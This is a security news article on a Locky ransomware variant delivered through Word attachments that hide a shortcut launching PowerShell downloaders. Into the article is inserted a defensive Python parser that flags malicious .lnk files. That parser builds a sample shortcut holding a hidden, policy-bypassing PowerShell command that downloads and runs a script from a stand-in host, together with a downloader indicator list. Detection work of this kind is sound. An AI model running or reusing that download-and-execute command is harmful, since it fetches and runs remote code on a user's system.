New Locky Ransomware Takes Another Turn

Published: 22/11/2024   Category: security




A newly discovered strain of Locky ransomware is masquerading as legitimate Microsoft Word documents.



Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications such as Microsoft Word and LibreOffice. Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky uses the same .asasin extension as a strain PhishMe picked up in October. However, it is crafted to manipulate users with a reportedly protected document, presented as an image:
Users who double-click the image trigger a series of actions that ultimately result in their files being encrypted under the .asasin file extension. Several other files, containing payment details, are written to disk.
Behind the image in the Word document, researchers found a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.
The second script connects to the Internet and downloads a Windows executable, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and comes from a legitimate Microsoft application.
Once it's on the victim's machine, the malware collects information about the operating system, sends it encrypted to the command-and-control server, and retrieves the encryption key.
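The delivery chain above starts with a shortcut whose target and arguments are readable without running anything. As an added, defender-side example (not code from the article or from Avira or PhishMe), this Python parses the StringData section of a Windows .lnk file and flags shortcuts whose target path and arguments look like a PowerShell downloader; the two shortcut files are constructed in memory, and the indicator list is an assumption chosen for illustration.

```python
import struct

# Shell Link (.lnk) constants from the MS-SHLLINK layout; everything built here is a constructed sample.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
STRING_NAMES = ("name", "relative_path", "working_dir", "arguments", "icon_location")

def build_lnk(rel_path: str, args: str) -> bytes:
    """Build a minimal shortcut: 76-byte ShellLinkHeader plus unicode RelativePath and CommandLineArguments."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I", 76) + LNK_CLSID + struct.pack("<II", flags, 0x80)  # LinkFlags, FILE_ATTRIBUTE_NORMAL
    header += b"\x00" * 24 + struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0)  # FILETIMEs, FileSize, IconIndex, ShowCommand, HotKey, reserved
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (rel_path, args))
    return header + body

def parse_lnk(data: bytes) -> dict:
    """Read LinkFlags, skip the optional IDList/LinkInfo blocks, then decode the StringData fields in order."""
    if len(data) < 76 or data[:4] != struct.pack("<I", 76) or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:    # LinkTargetIDList: 2-byte IDListSize followed by the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfo: its 4-byte LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags}
    for bit, key in zip((HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON), STRING_NAMES):
        if flags & bit:
            count, pos = struct.unpack_from("<H", data, pos)[0], pos + 2
            width = 2 if flags & IS_UNICODE else 1  # CountCharacters is in characters, not bytes
            out[key] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return out

# Substrings that, taken together, mark a shortcut as a PowerShell downloader rather than a document link.
INDICATORS = ("powershell", "downloadstring", "downloadfile", "iex ", "invoke-expression",
              "-enc", "-windowstyle hidden", "-w hidden", "bypass", "http")

def triage_lnk(data: bytes) -> list:
    """Return the indicators found in the shortcut's target path and arguments; [] means nothing flagged."""
    info = parse_lnk(data)
    text = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    return [s for s in INDICATORS if s in text]

# Constructed samples: an ordinary document shortcut and one shaped like the downloader the article describes.
BENIGN = build_lnk("..\\Documents\\report.docx", "")
SUSPECT = build_lnk("..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                    "-WindowStyle Hidden -ExecutionPolicy Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\"")
```

Real shortcuts usually also carry an IDList and LinkInfo block, which the parser skips by their declared sizes, so the same StringData walk applies to files pulled from a mail gateway or an endpoint.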
"We are seeing a rapid evolution in the way Locky is delivered," says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. "Locky stays the same, but the delivery technique is where we've really seen the most change."
Evolution of Locky: What does it mean?
Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.
"Locky has been one of the most popular malware libraries for a long time," says John Pironti, president of IP Architects. "It has been maturing, and that doesn't surprise me because it has been successful in financial gain."
"It's common to see adversaries refresh and renew old approaches to see which is most effective," he continues. "Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users."
It's misleading to call this recent finding a new strain of Locky, Griffin adds. The .asasin strain, which PhishMe also detected, is a more robust and more verbose script application delivery than other forms of Locky seen in the past. It collects basic information off the machine; nothing personally identifiable. This is the same malware arriving on a different path.
"We've seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages," Pironti says. People are more likely to open an attachment, the vector in Avira's finding, than they are to click a link.
"We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments," Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren't as suspicious as a potentially phishy link.
He notes that the .asasin extension is amusing. "They want to work off fear and force people to pay," he says.
This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They're taking advantage of the fact that phishing emails, while basic, work. "Why would they choose a really complex, sophisticated, unreliable means of delivering malware?" he says.
Defending against fake applications
Griffin points out that this is a clear example of abuse of Microsoft's Dynamic Data Exchange (DDE), a protocol for which Microsoft has just published guidance for users.
Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.
Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns that doing this incorrectly could cause serious problems that would require reinstallation of the operating system.